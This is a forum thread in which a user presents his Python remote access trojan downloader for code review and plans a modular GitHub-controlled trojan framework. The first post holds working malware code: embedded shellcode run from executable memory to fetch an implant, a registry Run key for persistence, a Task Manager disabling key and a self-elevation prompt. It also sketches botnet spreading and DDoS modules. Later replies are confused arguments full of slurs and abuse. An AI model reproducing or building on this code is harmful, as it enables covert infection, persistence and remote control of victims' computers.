User Controls

Sophie's Remote Access Trojan(Build 0.95) Modular Framework Integration

  1. #1
    Sophie Pedophile Tech Support
    Ok so you probably remember this thread http://niggasin.space/forum/technoph...omments-advice so i'm not going to go into what it exactly does. Well, i've been polishing my program making it more fancy and such and i'd like you to review my code. What's more is i plan on integrating gcat functionality into a modular trojan framework as illustrated in this thread:

    http://niggasin.space/forum/technoph...ojan-framework

    Some points to take from this are that github will serve as command and control, allowing me to have implants read in modules on the fly. Say for example i have my implants built and deployed they're going to be checking a JSON file.


    [
    {
    "module" : "dirlister"
    },
    {
    "module" : "environment"
    }
    ]


    Which will tell them which modules to fetch, in this case, dirlister and environment. As opposed to gcat i plan to include multi-platform support in this trojan framework, so i will be needing some Linux/Mac specific modules.

    In any event, here's the new code for the downloader, i'll get into the trojan framework a bit later on.


    import os
    import sys
    import ctypes
    import os.path
    import _winreg
    import pythoncom
    import pywintypes
    import win32api
    import win32com.shell.shell as shell

    # Main function.
    def execute():
    # Download file to path and execute (shellcode example)
    shellcode = bytearray(
    "\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
    "\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
    "\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
    "\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
    "\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
    "\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
    "\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
    "\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
    "\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
    "\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
    "\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
    "\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
    "\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
    "\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
    "\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
    "\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
    "\x5e\xa4\xb4")

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

    # Reg key to run implant at boot
    aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
    aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
    SetValueEx(aKey,"foobar",1, REG_SZ, PATH)
    CloseKey(aKey)

    # Disable task manager for good measure
    aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
    aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE)
    SetValueEx(aKey,"DisableTaskMgr",1, REG_DWORD, 0)
    CloseKey(aKey)


    I decided to have the main operation of the program run as a function, because that's fancy as fuck and allows a greater deal of control. Because i'm going to be efficient and not execute anything that is not necessary.



    if not shell.IsUserAnAdmin():
    # Elevate privilege
    ASADMIN = "asadmin"

    if sys.argv[-1] != ASADMIN:
    script = os.path.abspath(sys.argv[0])
    params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
    shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
    sys.exit(0)


    In the spirit of not executing anything unnecessary, i'm chacking here to see if we already have admin privilege in which case it doesn't make sense to run some escalation logic.


    PATH = "C:\\SomeDir\\example\\implant.exe"

    if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
    sys.exit(0)
    else:
    execute()


    Finally, here i'm checking to see if the shellcode has already executed before and we already have our implant in place, if we do we're simply going to exit and if nor i'm calling the execute() function to have the main operation of the program proceed.

    https://github.com/NullArray/gcat

    [SIZE=48px]Modular Framework Integration[/SIZE]

    So this method of delivery is well suited for use with anything. I have a script that allows me to generate shellcode by my specifications, say we have our trojan uploaded to www.example.com/implant.exe i can simply define so in my script plus the directory it will be downloaded to and it will generate the shellcode i need. The beatuty of the modular framework is that i can add modules to any trojan in the field simply by pushing them to github with Git Bash. Say for example i want to find out what environment i'm in so i can set up a targeted attack, i'll simply run the environment module from my end:


    import os

    def run(**args):
    print "
    [*] In environment module"
    return str(os.version)


    And get my results, it's as simple as that. Say my implant is in a Linux environment, now i can tailor make a new module to be employed in this scenario, push it to github, have my implants integrate it and run it from my end. The sky is the limit. Now to this end i'd like to collaborate on module development and such. What's more, i need a way of uniquely identifying each implant to send and receive data from in order for them to be generated and deployed on the fly. Say for instance we integrate a module that scans the network and automatically migrates to hosts that are up and combine this with the initial method of deployment(By downloader) we'll have a certified botnet in no time. Like i said you can get as creative as you want with this. Need to DDoS a nigga'? No problem just push a DDoS module to github etcetera, now obviously there are things far cooler than DDoS'ing some site but you get the general idea.

    Questions, advice, thoughts comments?
  2. #2
    You suck at this.

    Do you realise how advanced software like Windows is and how they will protect their billion dollar making products vehemently? Do you realise that them not having this type of code in their software would be a national security issue and something cyber command would be on top of?

    They have code in Microsoft that you won't be able to find that will set of an alert internally when something is detected that is:

    accessing the internet and is not internet explorer, skype or something else with a verified and registered source and product key
    recording data in concert with activity (eg KEYLOGGER)
    enabling remote access

    therefore, there is no such thing as a government undetectable trojan. You can hack your next door neighbour. Everything else is next to useless.
  3. #3
    Therefore 'North Korean' and 'Chinese' hackers are not. You cannot hack the US government on the US internet system. They are domestic enemies who are within government circles. Saying the government is attacking you in the media is bad for national security. So it was Kim Jong faggot.

    But they are supporting North Korea so whatever. They are North Korean hackers.
  4. #4
    Sophie Pedophile Tech Support
    Uhm, where did you see me calling it a 'government undetectable trojan' whatever that's supposed to mean, read the thread again you unrepentant idiot. By the way, you'll earn the right to tell me i suck when you show me a better version of your own creation. Also, going by your reply, you know nothing of computers so please do us all a favor and stop talking.
  5. #5
    Sophie Pedophile Tech Support
    Your post read like that faggot from RDFRN that was coming into that NSA thread spouting his bullshit about how you have top secret clearance and assorted nonesense. If you're the same person, please kill yourself now, oh and here's something for you as well:

    [SIZE=48px]FUCK THE US GOVERNMENT AND ALL IT'S INSTITUTIONS[/SIZE]

    Allahu akbar motherfucker.
  6. #6
    A trojan is illegal and serves no purpose unless you are trying to secretly obtain information. You can't secretly wire transfer money it leaves a huge trail.

    And if you are after information, your software is more than detectable.
  7. #7
    You started this rap battle. In my intro thread.
  8. #8
    Sophie Pedophile Tech Support
    A trojan is illegal

    Indeed, i care not however.

    and serves no purpose

    It does, building a trojan teaches you how they operate so you can better understand the complexities involved to become a better programmer/hacker.

    unless you are trying to secretly obtain information.

    This would be possible.

    You can't secretly wire transfer money it leaves a huge trail.

    You can transfer bitcoin.

    And if you are after information, your software is more than detectable.

    Indeed, but by how great a percentage of the population? And how long until the AV companies catch on? There are methods of protecting your software from reverse engineering and being detected, and it so happens i am acquainted with these methods. Now, i'm not saying no one will notice, but by the time someone does, it will already be too late. That is of course if i were to deploy this trojan in real life, which i may or may not do.

  9. #9
    If you want to discover if the girl you likes has a boyfriend, your trojan will get that secret information without having to ask her.

    Major companies....... firewall. All software has a signed access key.

    defense industries etc...

    They will detect it. And feed the information they want you to have to manipulate you.

    And bitcoin is not secure. The media told you it is secret and undetectable. Therefore, it isn't. It is there to steer anyone with a propensity for secret dealings involving international anything, including crime, terrorism or espionage, towards an area where they are instantly detectable.
  10. #10
    Sophie Pedophile Tech Support
    If you want to discover if the girl you likes has a boyfriend, your trojan will get that secret information without having to ask her.

    She does have a boyfriend, me. HO! Also, if my trojan is so insignificant, i'd happily upload an implant for you so you can test how useless it is, how does that sound?

    Major companies……. firewall. All software has a signed access key.

    I'm not targeting companies, but i'll just say this. Will they have SMTP ports closed? I think not because they couldn't send mail, this trojan(as of yet) contacts its control server via SMTP.

    defense industries etc…

    Yeah, i'm not ready to tango with the US millitary nor is it the point of this thread to do so.

    And bitcoin is not secure.

    Indeed? I'll have you link me studies by the scientific community backing this claim up.

    The media told you it is secret and undetectable. Therefore, it isn't. It is there to steer anyone with a propensity for secret dealings involving international anything, including crime, terrorism or espionage, towards an area where they are instantly detectable.

    You're more of a conspiracy cook than i am.

  11. #11
    Do they still use STMP servers or is it cloud based for increased security?

    If the email ports are being accessed when the email client that is linked to the high security software is not being utilised, it will find the source and kill it.

    There's nothing internet to do.
  12. #12
    Sophie Pedophile Tech Support
    Do they still use STMP servers or is it cloud based for increased security?

    Let's say it was cloud based. That still doesn't mean SMTP can't be utilized.

    If the email ports are being accessed when the email client that is linked to the high security software is not being utilised, it will find the source and kill it.

    That would depend on the security software, like i said, it doesn't matter the purpose of the trojan is not to attack companies besides there are smarter ways to target companies that involve a number of techniques.

  13. #13
    If it was cloud based for the purposes of high security it would only think it was using a SMTP server to send emails so that existing software was compatible. Or new developed software would know it was going straight to the cloud in blocks of data to one access point. And at the cloud it would ONLY allow http through and whatever else there is, like STMP. And that would be sent in a block to your access point. In reality everything would just be uploaded in chunks bypassing common security risks such as dedicated email ports. Like a can of soup. All in one place. One access point. Rather than making soup from all different ingredients from all over the place risking cross contamination (food safety standards 101).
  14. #14
    Sophie Pedophile Tech Support
    Well if we're allowing HTTP what's stopping me from using website X, Y or Z as C&C? You're starting to sound like spectral bro.
  15. #15
    What does that mean?

    All I know is the internet system is not capable of any exploits beyond stealing your classmates study notes.
  16. #16
    Do you mean hiding a file in the system?

    Does it need outside access to be effective?

    It gets blocked on the computer and at the cloud.
  17. #17
    Sophie Pedophile Tech Support
    Do you mean hiding a file in the system?

    Does it need outside access to be effective?

    It gets blocked on the computer and at the cloud.

    Really... How, you just said we're allowing HTTP.

    And at the cloud it would ONLY allow http through and whatever else there is, like STMP
  18. #18
    Sorry this faggot shit on your trojan. Ill take a look at it later but my woman is yelling at me to clean shit up. So I better do what she says. Got a tldr of imporvements over the last?
  19. #19
    Sophie Pedophile Tech Support
    Sorry this faggot shit on your trojan. Ill take a look at it later but my woman is yelling at me to clean shit up. So I better do what she says. Got a tldr of imporvements over the last?

    Made it more fancy, added logic to disable task manager and i plan on integrating it into a modular framework with github as C&C so i can add modules live to the implants.
  20. #20
    If it's getting routed through a server it is not allowing a direct connection to your computer.
Jump to Top